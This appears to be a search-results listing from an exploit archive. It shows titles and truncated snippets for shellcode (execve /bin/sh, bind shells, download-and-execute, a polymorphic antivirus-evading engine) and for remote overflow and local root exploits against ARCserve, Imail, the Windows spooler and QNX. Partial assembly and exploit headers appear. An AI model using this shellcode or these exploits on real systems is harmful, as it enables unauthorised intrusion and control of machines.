7259 matches found
bsd/x86 setuid/portbind shellcode 94 bytes
No description provided by source. / $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ portbind-bsd.c - setuid/portbind shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Simple portbind shellcode that bind's a setuid0 shell on...
openbsd/x86 execve(/bin/sh) 23 bytes
No description provided by source. / OpenBSD/x86 Shellcode for: execve"/bin/sh", "/bin/sh", NULL 23 bytes hophet at gmail.com http://www.nlabs.com.br/hophet/ Fancy mappings by iruata souza muzgo iru.muzgo!gmail.com http://openvms-rocks.com/muzgo/ / include sys/types.h include sys/stat.h include...
linux/x86 HTTP/1.x GET, Downloads and execve() 111 bytes+
No description provided by source. / linux/x86 - HTTP/1.x GET, Downloads and execve - 111 bytes+ This shellcode allows you to download a ELF executable straight off a standard HTTP server and launch it. It will saved locally it into a filename called 'A' in the current directory. CONFIGURATION Th...
Microsoft Excel畸形字符串远程代码执行漏洞
Microsoft Excel是非常流行的电子表格处理办公软件。 Microsoft Excel处理畸形文件格式时存在漏洞,远程攻击者可能利用此漏洞通过诱骗用户打开恶意文件控制用户机器。 如果用户受骗打开了恶意的Excel文件的话,就可能导致执行任意代码。目前这个漏洞正在被名为Exploit-MSExcel.h的木马积极地利用。在打开畸形的XLS文件时会执行以下操作: 在内存中解压异或加密的shellcode 对于Windows XP Service Pack 2,使用硬编码的地址加载KERNEL32.DLL;对于其他Windows版本,Excel会崩溃...
linux/x86-64 execve(/bin/sh) 33 bytes
No description provided by source. Linux/X86-64 Dummy for shellcode: execve"/bin/sh", "/bin/sh", NULL hophet at gmail.com .text .globl start start: xorq %rdx, %rdx movq $0x68732f6e69622fff,%rbx shr $0x8, %rbx push %rbx movq %rsp,%rdi xorq %rax,%rax pushq %rax pushq %rdi movq %rsp,%rsi mov $0x3b,%...
Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ======================================================== Imail 8.10-8.12 RCPT TO Remote Buffer Overflow Exploit ======================================================== !/usr/bin/perl...
CA BrightStor ARCserve (lgserver.exe) Remote Stack Overflow Exploit
No description provided by source. !/usr/bin/python Remote exploit for the CA BrightStor Arcserve stack overflow as described in http://www.securityfocus.com/archive/1/458648/30/0/threaded Winny Thomas ;- Author shall bear no responsibility for any screw ups caused by using this code import os...
CA BrightStor ARCserve - lgserver.exe Remote Stack Overflow
CA BrightStor ARCserve - lgserver.exe Remote Stack Overflow !/usr/bin/python Remote exploit for the CA BrightStor Arcserve stack overflow as described in http://www.securityfocus.com/archive/1/458648/30/0/threaded Winny Thomas ;- Author shall bear no responsibility for any screw ups caused by usi...
CA BrightStor ARCserve (lgserver.exe) Remote Stack Overflow Exploit
Exploit for unknown platform in category remote exploits =================================================================== CA BrightStor ARCserve lgserver.exe Remote Stack Overflow Exploit =================================================================== !/usr/bin/python Remote exploit for th...
Multiple Printer Providers (spooler service) Privilege Escalation Exploit
No description provided by source. /Private exploit- internal use only Title: Universal exploit for vulnerable printer providers spooler service. Vulnerability: Insecure EnumPrintersW calls Author: Andres Tarasco Acu [email protected] Website: http://www.514.es This code should allow to gain SYSTEM...
CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit 2
No description provided by source. !/usr/bin/perl original exploit by lssec.com this is a perl porting acaro at jervus.it use IO::Socket::INET; use Switch; if @ARGV 3 print "--------------------------------------------------------------------\n"; print "Usage : BrightStoreARCServer-11-5-4targets....
SSC DiskAccess NFS Client - 'DAPCNFSD.dll' Remote Stack Buffer Overflow
// source: https://www.securityfocus.com/bid/22301/info Shaffer Solutions Corp DiskAccess is prone to a stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit this...
ptrace suids local root.txt
bash-2.05a$ uname -a QNX muh 6.3.2 2006/03/16-14:19:50EST x86pc x86 bash-2.05a$ gdb -q /usr/bin/ping we use some ret-to-libc-type-shellcode gdb p system $1 = text variable, no debug info 0xb031897c system gdb p exit $2 = text variable, no debug info 0xb0321ff8 exit gdb q bash-2.05a$ export...
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)
!/usr/bin/python I couldnt find a reliable exploit for my analysis and so came up with this. Remote exploit for the CA BrightStor msgeng.exe service heap overflow vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was tested on windows 2000 SP0. Opens a shell on TCP port 4444...
CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit
Exploit for unknown platform in category remote exploits ================================================================ CA BrightStor ARCserve msgeng.exe Remote Heap Overflow Exploit ================================================================ !/usr/bin/python I couldnt find a reliable...
CA BrightStor ARCserve - msgeng.exe Remote Heap Overflow (1)
CA BrightStor ARCserve - msgeng.exe Remote Heap Overflow 1 !/usr/bin/python I couldnt find a reliable exploit for my analysis and so came up with this. Remote exploit for the CA BrightStor msgeng.exe service heap overflow vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was...
Download & Exec polymorphed shellcode Engine
No description provided by source. Download & Exec polymorphed shellcode engine POC This downloading and execution code is not detectable by popular AVs. Greetz 2: DarkEagle and Unl0ck researcherz; Str0ke and milw0rm; HD Moor and metasploit project; Maxus, Fuchunic, YrSam, Garry; Offtopic and PTT...
Download & Exec polymorphed shellcode Engine
Exploit for generator platform in category shellcode ============================================ Download & Exec polymorphed shellcode Engine ============================================ Download & Exec polymorphed shellcode engine POC This downloading and execution code is not detectable by...
Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC
No description provided by source. / This is a PoC exploit for Intel Centrino ipw2200 integrated wireless card. Author: Giuseppe Gottardi aka oveRet [email protected] Senior Security Engineer at Communication Valley S.p.A. This version of code is only a Proof of Concept stack based exploit...
Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC
Exploit for unknown platform in category remote exploits ============================================================ Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC ============================================================ / This is a PoC exploit for Intel Centrino ipw2200...